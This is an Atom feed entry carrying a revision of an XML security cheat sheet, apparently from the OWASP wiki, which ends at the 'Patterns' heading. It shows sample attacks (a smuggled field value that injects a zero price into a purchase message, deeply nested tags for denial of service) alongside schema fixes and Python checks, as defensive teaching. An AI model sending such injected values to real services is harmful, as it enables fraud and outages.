<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Fernando.arnaboldi</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Fernando.arnaboldi"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Fernando.arnaboldi"/>
		<updated>2026-05-19T10:22:08Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=238559</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=238559"/>
				<updated>2018-03-13T20:00:37Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: White space missing&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; __NOTOC__&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
 __TOC__{{TOC hidden}}&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server-side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software, divided into two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken to process a regular XML document with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
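&lt;br /&gt;
The comparison described above can be sketched in a few lines of Python. This is only a rough illustration, assuming the standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; parser; the helper names &amp;lt;tt&amp;gt;build_document&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;timed_parse&amp;lt;/tt&amp;gt; and the document size are hypothetical, and a real assessment should use the parser and documents of the application under test:&lt;br /&gt;

```python
import time
import xml.etree.ElementTree as ET


def build_document(items: int) -> bytes:
    """Serialize a flat, well-formed document with `items` child elements."""
    root = ET.Element("root")
    for i in range(items):
        ET.SubElement(root, "item").text = str(i)
    return ET.tostring(root)


def timed_parse(data: bytes) -> tuple[bool, float]:
    """Return (parsed_ok, seconds) for a single parse attempt."""
    start = time.perf_counter()
    try:
        ET.fromstring(data)
        ok = True
    except ET.ParseError:
        ok = False
    return ok, time.perf_counter() - start


well_formed = build_document(10_000)
# Dropping the last byte leaves the final end tag incomplete,
# which makes the document malformed.
malformed = well_formed[:-1]

ok_good, t_good = timed_parse(well_formed)
ok_bad, t_bad = timed_parse(malformed)
print(f"well-formed: parsed={ok_good} in {t_good:.4f}s")
print(f"malformed:   parsed={ok_bad} in {t_bad:.4f}s")
```

A single measurement is noisy, so repeating each parse several times and comparing the averages gives a more reliable picture.&lt;br /&gt;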
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;nowiki&amp;gt;&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;&amp;lt;/nowiki&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
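&lt;br /&gt;
The effect of trusting the first value can be illustrated with a short Python sketch. It assumes the standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; module; the handlers &amp;lt;tt&amp;gt;naive_price&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;strict_price&amp;lt;/tt&amp;gt; are hypothetical and only stand in for application logic. The injected message is rebuilt element by element instead of being written as a literal:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET
from typing import Optional

# Rebuild the injected message from the text: two id and two price children.
buy = ET.Element("buy")
ET.SubElement(buy, "id").text = "123"
ET.SubElement(buy, "price").text = "0"     # bogus price injected by the attacker
ET.SubElement(buy, "id")                   # empty id that keeps the document well formed
ET.SubElement(buy, "price").text = "10"    # price appended by the application

# Round-trip through the parser, as a receiving service would.
message = ET.fromstring(ET.tostring(buy))


def naive_price(doc: ET.Element) -> Optional[str]:
    """Hypothetical handler that trusts the first price element it finds."""
    return doc.findtext("price")


def strict_price(doc: ET.Element) -> Optional[str]:
    """Hypothetical handler that insists on exactly one id followed by one price."""
    if [child.tag for child in doc] != ["id", "price"]:
        raise ValueError("unexpected document structure")
    return doc.findtext("price")


print(naive_price(message))   # prints 0, the attacker-controlled value
```

Calling &amp;lt;tt&amp;gt;strict_price(message)&amp;lt;/tt&amp;gt; raises a &amp;lt;tt&amp;gt;ValueError&amp;lt;/tt&amp;gt; for this message. A schema that fixes the sequence of elements achieves the same control declaratively.&lt;br /&gt;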
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1,000,000 digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; element contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size of the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server. Typically this type of element should be restricted to a maximum number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters. As an example of this scenario, when using XML encryption, some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered it valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions were only partially enforced for the element, which suggests that the information was probably checked by an application rather than against the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number could cause a negative result on the user’s account. Using &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt; avoids this logical vulnerability. &lt;br /&gt;
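&lt;br /&gt;
The arithmetic behind this issue can be shown with a minimal Python sketch. The helper &amp;lt;tt&amp;gt;order_total&amp;lt;/tt&amp;gt; is hypothetical and only approximates the &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; constraint at the application level; Python's &amp;lt;tt&amp;gt;int()&amp;lt;/tt&amp;gt; does not accept exactly the same lexical forms as the schema type, so it is not a replacement for schema validation:&lt;br /&gt;

```python
from decimal import Decimal


def order_total(price: str, quantity: str) -> Decimal:
    """Compute price * quantity, accepting only quantities of 1 or more.

    Approximates the xs:positiveInteger constraint; order_total is a
    hypothetical helper, not part of any library.
    """
    qty = int(quantity)   # raises ValueError for text that is not an integer
    if qty >= 1:
        return Decimal(price) * qty
    raise ValueError("quantity must be a positive integer")


print(Decimal("10") * int("-3"))   # an unchecked xs:integer quantity yields -30
print(order_total("10", "3"))      # 30
```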
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
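Because &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; is defined as &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt;, the values Infinity and NaN are not valid and will be rejected during validation instead of reaching the application. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;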
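&lt;br /&gt;
The same distinction exists in application code. The following Python sketch is an illustration only: &amp;lt;tt&amp;gt;parse_price&amp;lt;/tt&amp;gt; is a hypothetical helper that approximates the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type by rejecting the special values, although Python's &amp;lt;tt&amp;gt;Decimal&amp;lt;/tt&amp;gt; accepts some forms (such as exponents) that the schema type does not:&lt;br /&gt;

```python
import math
from decimal import Decimal, InvalidOperation


def parse_price(text: str) -> Decimal:
    """Parse a price, rejecting NaN and infinities (hypothetical helper)."""
    try:
        value = Decimal(text)
    except InvalidOperation:
        raise ValueError(f"not a number: {text!r}") from None
    if not value.is_finite():
        raise ValueError(f"special value not allowed: {text!r}")
    return value


# float() accepts the special values that xs:float and xs:double allow.
print(math.isnan(float("NaN")), math.isinf(float("INF")))   # True True
```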
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, there are only 12 months, and so on. The schema can enforce these restrictions for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
